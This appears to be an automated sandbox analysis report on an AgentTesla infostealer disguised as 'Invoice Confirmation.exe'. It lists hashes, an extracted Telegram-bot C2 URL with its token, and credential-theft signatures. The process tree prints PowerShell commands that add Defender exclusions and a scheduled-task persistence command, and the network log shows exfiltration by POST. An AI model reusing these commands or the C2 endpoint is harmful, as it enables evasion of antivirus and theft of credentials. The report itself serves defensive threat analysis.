Resubmissions

03/01/2025, 23:07 UTC

250103-2344xa1kcj 10

03/01/2025, 12:42 UTC

250103-pxdcsatray 10

03/01/2025, 12:26 UTC

250103-pmhvhstlhw 10

Analysis

  • max time kernel
    130s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/01/2025, 20:46 UTC

General

  • Target

    Invoice Confirmation.exe

  • Size

    810.6MB

  • MD5

    63395033fc8d13ddd17e74e4bb13d5d6

  • SHA1

    0a65c313504c8bcac8dc2eec944dd078a71ce384

  • SHA256

    c322c179201974d21315230539606d1292a9159527f3f2eafa9d6167e8f51ae2

  • SHA512

    4a1eb33f370ac2ba32bea1af287abe753edfa63e493e9045960303b1990c1cbdb289dd3ebd273ff87ad68b912b4e016877dd3f78b8ed5ce373a3f20b581a0718

  • SSDEEP

    12288:mIR4R52J+XtyfG+Lzb6C65feSfSecDAMEnLwh8aFfxc1C0rmZdXm8qzd9p2MIR:mIeeJfG+LNzecKiVfaBiHXU9pTI

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot6882044231:AAEdfz6RtcLc5FDAwOwS8UYabnK3tQ7x4bs/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Agenttesla family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Invoice Confirmation.exe
    "C:\Users\Admin\AppData\Local\Temp\Invoice Confirmation.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1524
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Invoice Confirmation.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5104
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\KmihxwKU.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:636
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KmihxwKU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2CB8.tmp"
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:4448
    • C:\Users\Admin\AppData\Local\Temp\Invoice Confirmation.exe
      "C:\Users\Admin\AppData\Local\Temp\Invoice Confirmation.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2736

Network

  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    83.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    83.210.23.2.in-addr.arpa
    IN PTR
    Response
    83.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-83deploystaticakamaitechnologiescom
  • flag-us
    DNS
    136.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    136.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    api.telegram.org
    Invoice Confirmation.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    POST
    https://api.telegram.org/bot6882044231:AAEdfz6RtcLc5FDAwOwS8UYabnK3tQ7x4bs/sendDocument
    Invoice Confirmation.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot6882044231:AAEdfz6RtcLc5FDAwOwS8UYabnK3tQ7x4bs/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dd2b6ed06215ed
    Host: api.telegram.org
    Content-Length: 1366
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Thu, 02 Jan 2025 20:48:31 GMT
    Content-Type: application/json
    Content-Length: 664
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
    Response
    88.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-88deploystaticakamaitechnologiescom
  • flag-us
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
  • 149.154.167.220:443
    https://api.telegram.org/bot6882044231:AAEdfz6RtcLc5FDAwOwS8UYabnK3tQ7x4bs/sendDocument
    tls, http
    Invoice Confirmation.exe
    2.6kB
    7.5kB
    13
    13

    HTTP Request

    POST https://api.telegram.org/bot6882044231:AAEdfz6RtcLc5FDAwOwS8UYabnK3tQ7x4bs/sendDocument

    HTTP Response

    200
  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    83.210.23.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    83.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    136.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    136.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    Invoice Confirmation.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    88.210.23.2.in-addr.arpa
    dns
    140 B
    133 B
    2
    1

    DNS Request

    88.210.23.2.in-addr.arpa

    DNS Request

    88.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    216 B
    158 B
    3
    1

    DNS Request

    11.227.111.52.in-addr.arpa

    DNS Request

    11.227.111.52.in-addr.arpa

    DNS Request

    11.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    0318ebb5a701f277256e534ded54ffa8

    SHA1

    7c0b312d2ef49f96dcc9abcda0782754e2dc8c71

    SHA256

    bd29da054e2aaeca985db8fbcc50c9923456519ed5007a5e650eba1eb89aabb8

    SHA512

    5c2d93fefafd6d8602e671280993f13f8525ec20c360e3c3a0a776b0de4e2c927a8660c9dc598098709c160a1aeed30a2b4dd604d41499145c3fcbbc3a8bd2ea

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0y4fe4k.jqi.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmp2CB8.tmp

    Filesize

    1KB

    MD5

    ee0b2e11bec1451402b31576baf0c049

    SHA1

    cafffa47191bb9417d22bb657c17d3e4ed9b8960

    SHA256

    c11ecf3af310e64f5fd468607cfbf22904e40218088cd91117b231472bd12e11

    SHA512

    0dffab0eaca9cc3d4d3f5faa2d20815fda4b0f35123efd497f1f4eacf4def7d0b90cf57a5fd43ae04c900ea27ffe8a78705a8aa4c8665402d5e72812ceaa8054

  • memory/636-88-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/636-68-0x000000006FCB0000-0x000000006FCFC000-memory.dmp

    Filesize

    304KB

  • memory/636-36-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/636-34-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/636-35-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/1524-64-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/1524-0-0x0000000074CDE000-0x0000000074CDF000-memory.dmp

    Filesize

    4KB

  • memory/1524-8-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/1524-1-0x0000000000290000-0x0000000000346000-memory.dmp

    Filesize

    728KB

  • memory/1524-2-0x0000000005150000-0x00000000056F4000-memory.dmp

    Filesize

    5.6MB

  • memory/1524-3-0x0000000004C40000-0x0000000004CD2000-memory.dmp

    Filesize

    584KB

  • memory/1524-4-0x0000000004C10000-0x0000000004C1A000-memory.dmp

    Filesize

    40KB

  • memory/1524-7-0x0000000074CDE000-0x0000000074CDF000-memory.dmp

    Filesize

    4KB

  • memory/1524-6-0x0000000004FE0000-0x0000000004FF8000-memory.dmp

    Filesize

    96KB

  • memory/1524-9-0x0000000006830000-0x00000000068B6000-memory.dmp

    Filesize

    536KB

  • memory/1524-10-0x0000000008C40000-0x0000000008CDC000-memory.dmp

    Filesize

    624KB

  • memory/1524-5-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/2736-60-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2736-89-0x0000000006140000-0x0000000006190000-memory.dmp

    Filesize

    320KB

  • memory/5104-23-0x00000000053E0000-0x0000000005734000-memory.dmp

    Filesize

    3.3MB

  • memory/5104-65-0x0000000006D90000-0x0000000006D9A000-memory.dmp

    Filesize

    40KB

  • memory/5104-28-0x00000000059F0000-0x0000000005A0E000-memory.dmp

    Filesize

    120KB

  • memory/5104-48-0x000000006FCB0000-0x000000006FCFC000-memory.dmp

    Filesize

    304KB

  • memory/5104-58-0x0000000005FA0000-0x0000000005FBE000-memory.dmp

    Filesize

    120KB

  • memory/5104-59-0x00000000069E0000-0x0000000006A83000-memory.dmp

    Filesize

    652KB

  • memory/5104-47-0x0000000005FC0000-0x0000000005FF2000-memory.dmp

    Filesize

    200KB

  • memory/5104-17-0x0000000005370000-0x00000000053D6000-memory.dmp

    Filesize

    408KB

  • memory/5104-62-0x0000000007360000-0x00000000079DA000-memory.dmp

    Filesize

    6.5MB

  • memory/5104-63-0x0000000006D10000-0x0000000006D2A000-memory.dmp

    Filesize

    104KB

  • memory/5104-15-0x0000000004B30000-0x0000000004B52000-memory.dmp

    Filesize

    136KB

  • memory/5104-29-0x0000000005A20000-0x0000000005A6C000-memory.dmp

    Filesize

    304KB

  • memory/5104-66-0x0000000006F90000-0x0000000007026000-memory.dmp

    Filesize

    600KB

  • memory/5104-67-0x0000000006F10000-0x0000000006F21000-memory.dmp

    Filesize

    68KB

  • memory/5104-16-0x0000000004BD0000-0x0000000004C36000-memory.dmp

    Filesize

    408KB

  • memory/5104-78-0x0000000006F40000-0x0000000006F4E000-memory.dmp

    Filesize

    56KB

  • memory/5104-79-0x0000000006F50000-0x0000000006F64000-memory.dmp

    Filesize

    80KB

  • memory/5104-80-0x0000000007050000-0x000000000706A000-memory.dmp

    Filesize

    104KB

  • memory/5104-81-0x0000000007030000-0x0000000007038000-memory.dmp

    Filesize

    32KB

  • memory/5104-84-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/5104-14-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/5104-13-0x0000000004C40000-0x0000000005268000-memory.dmp

    Filesize

    6.2MB

  • memory/5104-12-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/5104-11-0x00000000020E0000-0x0000000002116000-memory.dmp

    Filesize

    216KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.